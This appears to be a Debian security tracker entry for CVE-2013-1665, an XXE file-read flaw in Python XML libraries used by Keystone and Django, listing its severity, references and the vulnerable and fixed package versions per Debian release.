CVE-2013-1665

NameCVE-2013-1665
DescriptionThe XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used in OpenStack Keystone Essex and Folsom, Django, and possibly other products allow remote attackers to read arbitrary files via an XML external entity declaration in conjunction with an entity reference, aka an XML External Entity (XXE) attack.
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)
ReferencesDSA-2634-1
NVD severitymedium (attack range: remote)
Debian Bugs700948

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
keystone (PTS)jessie2014.1.3-6fixed
stretch2:10.0.0-9fixed
stretch (security)2:10.0.0-9+deb9u1fixed
buster, sid2:13.0.0-7fixed
python-django (PTS)jessie (security), jessie1.7.11-1+deb8u3fixed
stretch1:1.10.7-2+deb9u1fixed
stretch (security)1:1.10.7-2+deb9u2fixed
buster, sid1:1.11.15-1fixed

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
keystonesource(unstable)2012.1.1-13medium700948
python-djangosource(unstable)1.4.4-1medium
python-djangosourcesqueeze1.2.3-3+squeeze5mediumDSA-2634-1

Search for package or bug name: Reporting problems